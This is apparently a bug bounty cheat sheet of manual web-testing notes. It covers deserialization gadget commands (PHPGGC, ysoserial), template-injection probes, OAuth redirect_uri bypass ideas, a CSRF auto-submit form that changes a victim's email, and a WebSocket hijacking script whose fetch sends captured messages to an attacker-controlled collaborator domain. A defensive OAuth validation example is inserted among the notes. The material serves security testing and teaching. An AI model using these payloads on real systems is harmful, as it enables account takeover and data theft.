Bug Bounty — Manual Approach To Test Vulnerabilities (PART 1 )

Manual testing using Burp Suite
  • PHP — serialized object: O:4:"User":2:{s:4:"name":s:6:"carlos";s:10:"isLoggedIn":b:1;}
  • Java — serialized object begins with "ac ed" (hex) or "rO0" (base64)
  • PHP — PHPGGC
    ~ Function calls: exec | system
    ~ ./phpggc [PAYLOAD] [PARAMETERS] | base64 -w 0 | xclip -selection clipboard
    ~ Supply the encoded payload and the secret key (leaked via phpinfo()) to sha1-hmac-generator.php through the URL
  • Java — ysoserial
    ~ URL-encode the whole payload when sending it through a vulnerable cookie.
  • Reflected input but no XSS (no output, tags encoded, or an error message) -> test for server-side template injection by breaking out of the template expression, e.g. http://vulnerable.com/?greeting=data.username}}<tag>
  • Authorization request, common parameters: redirect_uri/response_type/scope/state
    GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=code&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1
    Host: oauth-authorization-server.com
  • Callback, common parameters: code/state
  • The callback is vulnerable to CSRF when the state parameter is missing or not validated.
    GET /callback?code=a1b2c3d4e5f6g7h8&state=ae13d489bd00e3c24 HTTP/1.1
    Host: client-app.com
  • Token request, common parameters: client_secret/grant_type/client_id/redirect_uri/code
  • Example:
    POST /token HTTP/1.1
    Host: oauth-authorization-server.com
    …
    client_id=12345&client_secret=SECRET&redirect_uri=https://client-app.com/callback&grant_type=authorization_code&code=a1b2c3d4e5f6g7h8
  • Note: When testing redirect_uri validation, try parameter pollution, SSRF/CORS defence bypass techniques, lookalike hosts such as localhost.evil-server.net, etc.
  • Note: If the redirect_uri parameter is sent together with the code/token, the server is likely not vulnerable.
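As an added example (not code from the original post), the authorization-server checks that the notes above probe for: exact redirect_uri matching, rejection of duplicated parameters, a required state value, and binding of the code to its client and redirect_uri at the token endpoint. The client registration and issued-code store are constructed sample data that reuse the identifiers from the requests above.

```python
import hmac
from urllib.parse import parse_qsl
# Constructed sample registration for one client; client_id, secret and
# redirect_uri reuse the sample values from the requests above.
REGISTERED_CLIENTS = {"12345": {"secret": "SECRET",
                                "redirect_uris": {"https://client-app.com/callback"}}}
ISSUED_CODES = {}  # code -> (client_id, redirect_uri) it was issued for

def parse_strict(query):
    """Parse a query string or form body, rejecting repeated keys (parameter pollution)."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key in params:
            raise ValueError(f"duplicate parameter: {key}")
        params[key] = value
    return params

def check_authorization_request(query):
    """Validate /authorization parameters; return them if acceptable."""
    p = parse_strict(query)
    client = REGISTERED_CLIENTS.get(p.get("client_id", ""))
    # redirect_uri must equal a registered value exactly: no prefix, subdomain or path matching.
    if client is None or p.get("redirect_uri") not in client["redirect_uris"]:
        raise ValueError("unknown client_id or unregistered redirect_uri")
    if p.get("response_type") != "code":
        raise ValueError("unsupported response_type")
    if not p.get("state"):  # the client relies on state to detect callback CSRF
        raise ValueError("missing state")
    return p

def check_token_request(form):
    """Validate /token parameters; True only if the code may be exchanged."""
    p = parse_strict(form)
    client = REGISTERED_CLIENTS.get(p.get("client_id", ""))
    if client is None or not hmac.compare_digest(p.get("client_secret", "").encode(), client["secret"].encode()):
        raise ValueError("client authentication failed")
    if p.get("grant_type") != "authorization_code":
        raise ValueError("unsupported grant_type")
    bound = ISSUED_CODES.pop(p.get("code", ""), None)  # codes are single use
    if bound != (p["client_id"], p.get("redirect_uri")):
        raise ValueError("code was not issued to this client and redirect_uri")
    return True

def is_rejected(check, data):
    """True when a check raises ValueError (used to exercise the negative cases)."""
    try:
        check(data)
    except ValueError:
        return True
    return False
```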
<script>
if (document.location.hash)
{
  console.log("Hash identified — redirecting…");
  window.location = '/?' + document.location.hash.substr(1);
}
else
{
  console.log("No hash identified in URL");
}
</script>
<html>
<body>
  <form action="https://vulnerable-website.com/email/change" method="POST">
    <input type="hidden" name="email" value="pwned@evil-user.net" />
  </form>
  <script>
    document.forms[0].submit();
  </script>
</body>
</html>
  • Identify design flaws:
  • Cross-Site WebSocket Hijacking (CSWSH):
<script>
var websocket = new WebSocket('wss://your-websocket-URL');
websocket.onopen = start;
websocket.onmessage = handleReply;
function start(event)
{
  websocket.send("READY");
}
function handleReply(event)
{
  fetch('https://your-collaborator-domain/?' + event.data, {mode: 'no-cors'});
}
</script>
  1. Virtual Hosting (VHosting):
  • Testing for HTTP Host Header Attacks.
  • DOM-based XSS
    ~ Common Sources
    ~ Common Sinks
    ~ Testing for Sinks
  • Bypassing CSP Controls
